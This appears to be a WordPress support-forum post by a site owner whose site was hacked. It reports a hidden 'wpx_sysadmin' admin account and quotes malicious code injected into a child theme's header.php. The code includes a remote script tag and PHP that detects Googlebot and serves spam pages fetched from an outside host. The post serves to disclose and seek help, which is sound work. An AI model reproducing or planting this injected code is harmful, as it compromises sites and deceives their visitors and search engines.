Not detected by Malware Scan
-
FYI
My website was hacked at the end of January.
Wordfence allowed me to clean up a lot of things. However, during the last scans, Wordfence wasn’t detecting anything, even though there was still abnormal behavior. When I logged in with my admin account, a script created a wpx_sysadmin administrator account.
I just found a modified file not detected by Wordfence: header.php in the child theme.
Here is the part that was added during the hack:
<script src="https://apix1.com/apix1x.js"></script>
<?php
function autoload()
{
$agents = array(
"Googlebot",
"Google-Site-Verification",
"Google-InspectionTool",
"Googlebot-Mobile",
"Googlebot-News"
);
foreach ($agents as $agent) {
if (strpos($_SERVER['HTTP_USER_AGENT'], $agent) !== false) return true;
}
return false;
}
if (autoload() && (
$_SERVER['REQUEST_URI'] === '/fr/foire-aux-questions/' || $_SERVER['REQUEST_URI'] === '/fr/foire-aux-questions'
)) {
$a = (
"https://cyberhexs.com/wdbos/nandara/fr-foire-aux-questions/"
);
$bot_content = file_get_contents($a);
echo $bot_content;
exit;
}
if (autoload() && (
$_SERVER['REQUEST_URI'] === '/en/guides-and-recommendations/' || $_SERVER['REQUEST_URI'] === '/en/guides-and-recommendations'
)) {
$a = (
"https://cyberhexs.com/hokijitu/nandara/en-guides-and-recommendations/"
);
$bot_content = file_get_contents($a);
echo $bot_content;
exit;
}
if (autoload() && (
$_SERVER['REQUEST_URI'] === '/fr/nous-contacter/' || $_SERVER['REQUEST_URI'] === '/fr/nous-contacter'
)) {
$a = (
"https://cyberhexs.com/wdmahjong/nandara/fr-nous-contacter/"
);
$bot_content = file_get_contents($a);
echo $bot_content;
exit;
}C’est donc le script https://apix1.com/apix1x.js qui posait problème.
The page I need help with: [log in to see the link]
Viewing 1 replies (of 1 total)
Viewing 1 replies (of 1 total)
You must be logged in to reply to this topic.
